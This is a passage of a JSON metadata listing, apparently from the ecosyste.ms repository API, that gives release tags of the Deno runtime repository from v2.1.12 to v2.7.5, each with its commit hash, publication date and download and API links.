:"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1